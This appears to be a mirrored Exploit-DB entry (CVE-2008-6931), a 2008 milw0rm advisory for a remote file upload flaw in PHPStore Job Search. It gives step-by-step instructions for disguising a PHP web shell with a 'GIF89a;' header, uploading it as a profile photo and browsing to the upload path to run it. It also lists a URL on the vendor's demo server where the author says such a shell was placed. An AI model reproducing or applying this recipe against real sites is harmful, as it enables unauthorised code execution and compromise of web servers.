- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7083
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6931
- Дата публикации
- 2008-11-10
Код:
PHPStore Job Search Remote File Upload
Author: ZoRLu msn: [email protected]
home: www.z0rlu.blogspot.com
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-----------------------------------------
exploit:
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
you register site and this site questions your photo. you upload your_shell.php
you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
you must see your photo
and right click to your photo select to properites
after copy photo link and paste your explorer go your shell
your_shell.php
http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
---------------------------------------------
example for demo:
shell: ( not permission for demo server )
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
------------------------------------------------
thanks: str0ke & yildirimordulari.org & darkc0de.com
# milw0rm.com [2008-11-10]- Источник
- www.exploit-db.com
